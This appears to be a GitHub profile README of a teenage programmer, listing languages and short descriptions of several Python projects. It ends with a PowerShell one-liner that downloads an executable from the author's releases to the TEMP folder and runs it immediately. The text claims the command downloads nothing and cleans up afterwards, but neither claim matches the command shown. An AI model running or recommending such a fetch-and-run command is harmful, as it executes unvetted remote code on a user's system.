Skip to content

zektrace/zektrace

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 

Repository files navigation

Programmer, 17y/o

Contact: zek.trace@myself.com

C++ Rust Go Python TypeScript Julia

Recent Projects

Interactive terminal portfolio built with pure Python. Zero dependencies, GitHub integration, cross-platform support. Compile to standalone executables with PyInstaller.

Cryptographic utilities built on Python's standard library. Zero external dependencies. Designed for rapid prototyping and restricted environments.

Minimal Python framework for building desktop apps using web technologies with native window control and a structured architecture.

Structured documentation template designed for clarity, scalability, and clean technical writing workflows.

Demonstration of steganography: concealing encrypted data inside images using low-level bit manipulation in Python.


Run my latest project without downloading anything.

iwr -Uri "https://github.com/zektrace/cli-portfolio/releases/download/V2.1.0/cli-portfolio-2.1.0-win64.exe" -OutFile "$env:TEMP\cli-portfolio.exe"; & "$env:TEMP\cli-portfolio.exe"

downloads the latest executable, runs it temporarily, and cleans up automatically.